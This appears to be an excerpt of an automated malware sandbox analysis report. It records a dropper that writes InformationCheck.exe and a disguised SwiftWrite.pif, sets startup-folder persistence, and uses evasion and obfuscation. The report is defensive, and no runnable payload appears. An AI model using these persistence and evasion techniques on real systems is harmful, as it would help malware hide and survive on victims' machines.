Source: C:\Windows\System32\wscript.exe Section loaded: twext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cscui.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: T6l6gPxwQU.exe Static PE information: Image base 0x140000000 > 0x60000000
Source: T6l6gPxwQU.exe Static file information: File size 1974272 > 1048576
Source: T6l6gPxwQU.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: T6l6gPxwQU.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: T6l6gPxwQU.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: T6l6gPxwQU.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: T6l6gPxwQU.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: T6l6gPxwQU.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: T6l6gPxwQU.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: T6l6gPxwQU.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: T6l6gPxwQU.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: T6l6gPxwQU.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: T6l6gPxwQU.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: T6l6gPxwQU.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: T6l6gPxwQU.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1932F4 LoadLibraryA,GetProcAddress, 0_2_00007FF6BB1932F4
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB157399 push rdi; ret 0_2_00007FF6BB1573A2
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1578FD push rdi; ret 0_2_00007FF6BB157904
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9B7E4300 push eax; ret 1_2_00007FFD9B7E430D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9B7E00AD pushad ; iretd 1_2_00007FFD9B7E00C1
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_0055E93F push edi; ret 3_2_0055E941
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_0055EA58 push esi; ret 3_2_0055EA5A
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_00598A4A push FFFFFF8Bh; iretd 3_2_00598A4C
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_00558B75 push ecx; ret 3_2_00558B88
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_0054CBF1 push eax; retf 3_2_0054CBF8
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_0055EC33 push esi; ret 3_2_0055EC35
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_0055ED1C push edi; ret 3_2_0055ED1E
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_008CE93F push edi; ret 10_2_008CE941
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_008CEA58 push esi; ret 10_2_008CEA5A
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_00908A4A push FFFFFF8Bh; iretd 10_2_00908A4C
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_008BCBF1 push eax; retf 10_2_008BCBF8
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_008C8B75 push ecx; ret 10_2_008C8B88
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_008CEC33 push esi; ret 10_2_008CEC35
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_008CED1C push edi; ret 10_2_008CED1E

Persistence and Installation Behavior
barindex
Drops PE files with a suspicious file extension
Source: C:\Users\Public\InformationCheck.exe File created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Jump to dropped file
Drops PE files
Source: C:\Users\Public\InformationCheck.exe File created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Jump to dropped file
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe File created: C:\Users\Public\InformationCheck.exe Jump to dropped file
Drops PE files to the user directory
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe File created: C:\Users\Public\InformationCheck.exe Jump to dropped file

Boot Survival
barindex
Drops PE files to the user root directory
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe File created: C:\Users\Public\InformationCheck.exe Jump to dropped file
Creates a start menu entry (Start Menu\Programs\Startup)
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url Jump to behavior
Stores files to the Windows start menu directory
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url Jump to behavior
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB144514 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_00007FF6BB144514
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_005B59B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 3_2_005B59B3
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_00545EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 3_2_00545EDA
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_009259B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 10_2_009259B3
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_008B5EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 10_2_008B5EDA
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_005533B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 3_2_005533B7
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3779 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6039 Jump to behavior
Found evasive API chain (date check)
Source: C:\Users\Public\InformationCheck.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe API coverage: 3.4 %
Source: C:\Users\Public\InformationCheck.exe API coverage: 4.7 %
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif API coverage: 4.4 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7524 Thread sleep time: -11990383647911201s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7560 Thread sleep time: -2767011611056431s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB19BC70 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00007FF6BB19BC70
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1A72A8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime, 0_2_00007FF6BB1A72A8
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1A71F4 FindFirstFileW,FindClose, 0_2_00007FF6BB1A71F4
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB19B7C0 FindFirstFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00007FF6BB19B7C0
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB162F50 FindFirstFileExW, 0_2_00007FF6BB162F50
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1AA4F8 FindFirstFileW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose, 0_2_00007FF6BB1AA4F8
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1AA350 FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose, 0_2_00007FF6BB1AA350
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1A6428 FindFirstFileW,FindNextFileW,FindClose, 0_2_00007FF6BB1A6428
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1AA874 FindFirstFileW,Sleep,FindNextFileW,FindClose, 0_2_00007FF6BB1AA874
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB19C7C0 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 0_2_00007FF6BB19C7C0
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_00594005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 3_2_00594005
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_0059494A GetFileAttributesW,FindFirstFileW,FindClose, 3_2_0059494A
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_0059C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 3_2_0059C2FF
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_0059CD14 FindFirstFileW,FindClose, 3_2_0059CD14
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_0059CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 3_2_0059CD9F
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_0059F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 3_2_0059F5D8
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_0059F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 3_2_0059F735
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_0059FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 3_2_0059FA36
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_00593CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 3_2_00593CE2
